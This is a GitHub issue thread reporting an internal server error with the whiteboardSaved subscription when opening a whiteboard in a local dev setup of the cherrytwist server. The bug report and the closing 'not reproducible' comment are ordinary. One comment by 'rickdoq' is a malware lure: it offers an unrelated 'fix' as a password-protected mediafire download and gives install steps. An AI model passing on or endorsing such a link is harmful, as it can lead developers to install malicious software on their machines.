### ISSUE TITLE
BUG: whiteboardSaved subscription failing

### ISSUE THREAD

**Issue by techsmyth** [cherrytwist/Server#4499]
**Describe the bug**
Opening up a whiteboard on local dev setup is giving an internal server error:

<img width="2000" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBN0NoQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--ef5c9ce64f31f08a8fa4bf486b3d57fe529b944c/image.png" alt="image.png" />

**To Reproduce**
1. Go to any whiteboard + open it

Note: on dev setup, latest packages installed + services recreated. 

**Expected behavior**
No errors are triggered when opening a whiteboard

**Screenshots**
It seems that the agentInfo is not set in the request context: 
<img width="1223" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBNitoQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--7daa160c5aca33da8013591ec71f1770e55d19ff/image.png" alt="image.png" />

**Desktop (please complete the following information):**
 - OS: windows

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Comoque1** [comment]
Not reproducible on sandbox env.
